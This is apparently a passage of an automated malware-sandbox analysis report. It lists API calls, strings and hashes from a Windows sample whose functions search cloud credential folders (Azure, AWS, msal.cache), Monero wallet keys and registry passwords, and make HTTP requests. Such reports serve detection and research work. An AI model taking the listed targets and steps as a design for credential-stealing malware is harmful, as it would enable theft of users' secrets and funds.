HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009863FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0098646D
InternetCloseHandle.WININET(00000000), ref: 009864EF
InternetCloseHandle.WININET(00000000), ref: 009864F9
InternetCloseHandle.WININET(00000000), ref: 00986503

Strings

ERROR, xrefs: 00986407
GET, xrefs: 0098637C
ERROR, xrefs: 009864C9

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 7911fb2d1d4fe7b3baa8e4beb4770b8314ce92314af820fc879ca850973718b0
Instruction ID: 2fae893c74fd11ac9b8188d5e99d966dbd2a872a15d917565fa3c0e42797629a
Opcode Fuzzy Hash: 7911fb2d1d4fe7b3baa8e4beb4770b8314ce92314af820fc879ca850973718b0
Instruction Fuzzy Hash: BF711D71A10218ABDF14EBA4DC49FEE7778FB48704F108199F50A6B290DBB46A85CF91

Function 00995510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A820: lstrlen.KERNEL32(00984F05,?,?,00984F05,009A0DDE), ref: 0099A82B
Part of subcall function 0099A820: lstrcpy.KERNEL32(009A0DDE,00000000), ref: 0099A885

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00995644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009956A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00995857

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00995228

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 009952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00995318
Part of subcall function 009952C0: lstrlen.KERNEL32(00000000), ref: 0099532F
Part of subcall function 009952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00995364
Part of subcall function 009952C0: lstrlen.KERNEL32(00000000), ref: 00995383
Part of subcall function 009952C0: lstrlen.KERNEL32(00000000), ref: 009953AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0099578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00995940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00995A0C
Sleep.KERNEL32(0000EA60), ref: 00995A1B

Strings

ERROR, xrefs: 009959FE
ERROR, xrefs: 00995849
ERROR, xrefs: 0099577D
ERROR, xrefs: 00995636
ERROR, xrefs: 00995693
ERROR, xrefs: 00995932

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 1a82de5fb428671e687905a2cd6ca8f4ff05762fc8ae2afde75fb7dc5980b37b
Instruction ID: bb82a02a085feb5ababf454824c2744f172377f7042a638b989d684a37c241d0
Opcode Fuzzy Hash: 1a82de5fb428671e687905a2cd6ca8f4ff05762fc8ae2afde75fb7dc5980b37b
Instruction Fuzzy Hash: 43E1FC719201089BDF14FBA9DC96FEE737DEB98304F508528B50667191EF346A09CBD2

Function 00994D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00998DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00998E0B

lstrcat.KERNEL32(?,00000000), ref: 00994DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00994DCD

Part of subcall function 00994910: wsprintfA.USER32 ref: 0099492C
Part of subcall function 00994910: FindFirstFileA.KERNEL32(?,?), ref: 00994943

lstrcat.KERNEL32(?,00000000), ref: 00994E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00994E59

Part of subcall function 00994910: StrCmpCA.SHLWAPI(?,009A0FDC), ref: 00994971
Part of subcall function 00994910: StrCmpCA.SHLWAPI(?,009A0FE0), ref: 00994987
Part of subcall function 00994910: FindNextFileA.KERNEL32(000000FF,?), ref: 00994B7D
Part of subcall function 00994910: FindClose.KERNEL32(000000FF), ref: 00994B92

lstrcat.KERNEL32(?,00000000), ref: 00994EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00994EE5

Part of subcall function 00994910: wsprintfA.USER32 ref: 009949B0
Part of subcall function 00994910: StrCmpCA.SHLWAPI(?,009A08D2), ref: 009949C5
Part of subcall function 00994910: wsprintfA.USER32 ref: 009949E2
Part of subcall function 00994910: PathMatchSpecA.SHLWAPI(?,?), ref: 00994A1E
Part of subcall function 00994910: lstrcat.KERNEL32(?,0157E4D8), ref: 00994A4A
Part of subcall function 00994910: lstrcat.KERNEL32(?,009A0FF8), ref: 00994A5C
Part of subcall function 00994910: lstrcat.KERNEL32(?,?), ref: 00994A70
Part of subcall function 00994910: lstrcat.KERNEL32(?,009A0FFC), ref: 00994A82
Part of subcall function 00994910: lstrcat.KERNEL32(?,?), ref: 00994A96
Part of subcall function 00994910: CopyFileA.KERNEL32(?,?,00000001), ref: 00994AAC
Part of subcall function 00994910: DeleteFileA.KERNEL32(?), ref: 00994B31

Strings

Azure\.aws, xrefs: 00994E5F
Azure\.IdentityService, xrefs: 00994EEB
\.aws\, xrefs: 00994E4D
Azure\.azure, xrefs: 00994DD3
msal.cache, xrefs: 00994EF0
\.azure\, xrefs: 00994DC1
*.*, xrefs: 00994DD8
\.IdentityService\, xrefs: 00994ED9
*.*, xrefs: 00994E64

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 9331a2223cac6d6fbeda33ddf535c8eb29d4f06321b87e173b14d44df70740f0
Instruction ID: 555ef0adda6d762fb4ffad3eac851ed27c16797a6eadcaba26fe8478278f9f16
Opcode Fuzzy Hash: 9331a2223cac6d6fbeda33ddf535c8eb29d4f06321b87e173b14d44df70740f0
Instruction Fuzzy Hash: ED41867A95021867CB50F770EC47FED773CABA5704F004454B645A60C1EEB45BC98BD2

Function 00981310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009812B4
Part of subcall function 009812A0: RtlAllocateHeap.NTDLL(00000000), ref: 009812BB
Part of subcall function 009812A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 009812D7
Part of subcall function 009812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009812F5
Part of subcall function 009812A0: RegCloseKey.ADVAPI32(?), ref: 009812FF

lstrcat.KERNEL32(?,00000000), ref: 0098134F
lstrlen.KERNEL32(?), ref: 0098135C
lstrcat.KERNEL32(?,.keys), ref: 00981377

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 00998B60: GetSystemTime.KERNEL32(009A0E1A,0157CC08,009A05AE,?,?,009813F9,?,0000001A,009A0E1A,00000000,?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 00998B86

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00981465

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009899EC
Part of subcall function 009899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00989A11
Part of subcall function 009899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00989A31
Part of subcall function 009899C0: ReadFile.KERNEL32(000000FF,?,00000000,0098148F,00000000), ref: 00989A5A
Part of subcall function 009899C0: LocalFree.KERNEL32(0098148F), ref: 00989A90
Part of subcall function 009899C0: CloseHandle.KERNEL32(000000FF), ref: 00989A9A

DeleteFileA.KERNEL32(00000000), ref: 009814EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00981335
\Monero\wallet.keys, xrefs: 0098138D
.keys, xrefs: 0098136B
wallet_path, xrefs: 00981330

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: ef9ae599e7adc82cf53367f9d8e304591c9b16a9049922878239c0b1d2da181c
Instruction ID: 5ce417a435d14dffe7925b07c7df763a91bbc612ef3d58f01288978501c26ead
Opcode Fuzzy Hash: ef9ae599e7adc82cf53367f9d8e304591c9b16a9049922878239c0b1d2da181c
Instruction Fuzzy Hash: B65112B1D501199BCB15FB64DD92FED737CEF94304F404198B60AA2091EE706B8ACBE6

Function 009875D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009872D0: memset.MSVCRT ref: 00987314
Part of subcall function 009872D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0098733A
Part of subcall function 009872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009873B1
Part of subcall function 009872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0098740D
Part of subcall function 009872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00987452
Part of subcall function 009872D0: HeapFree.KERNEL32(00000000), ref: 00987459

lstrcat.KERNEL32(35987020,009A17FC), ref: 00987606
lstrcat.KERNEL32(35987020,00000000), ref: 00987648
lstrcat.KERNEL32(35987020, : ), ref: 0098765A
lstrcat.KERNEL32(35987020,00000000), ref: 0098768F
lstrcat.KERNEL32(35987020,009A1804), ref: 009876A0
lstrcat.KERNEL32(35987020,00000000), ref: 009876D3
lstrcat.KERNEL32(35987020,009A1808), ref: 009876ED
task.LIBCPMTD ref: 009876FB

Strings

: , xrefs: 0098764E

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: d38a3fcf4107043959edd669efcdd93ee97188d58a490e48b67b0d9f9e2a4f56
Instruction ID: 202ebf1955ce9f6aefedecbd240582a2f26e9b02ca5b97818ba4cf7baa660563
Opcode Fuzzy Hash: d38a3fcf4107043959edd669efcdd93ee97188d58a490e48b67b0d9f9e2a4f56
Instruction Fuzzy Hash: 6D313C72904109DBCB04FBE4DC99EFFB779BB89705B244518F102A7390DE34A946CBA2

Function 009872D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00987314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0098733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009873B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0098740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00987452
HeapFree.KERNEL32(00000000), ref: 00987459
task.LIBCPMTD ref: 00987555

Strings

Password, xrefs: 00987401

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: 85d7983e307c03025820d22a30782a5c0f047472877daa6f5deb0bf515a25093
Instruction ID: 43e017a4678674f4d4cf7103ff6f7efe1d9a5cc387ed5d96fb73e9feba2cb9b8
Opcode Fuzzy Hash: 85d7983e307c03025820d22a30782a5c0f047472877daa6f5deb0bf515a25093
Instruction Fuzzy Hash: 81611BB59041689BDB24EF50CC45FDAB7B8BF88304F1081E9E649A6241DF709BC9CFA1

Function 00997500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00997542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0099757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997603
RtlAllocateHeap.NTDLL(00000000), ref: 0099760A
wsprintfA.USER32 ref: 00997640

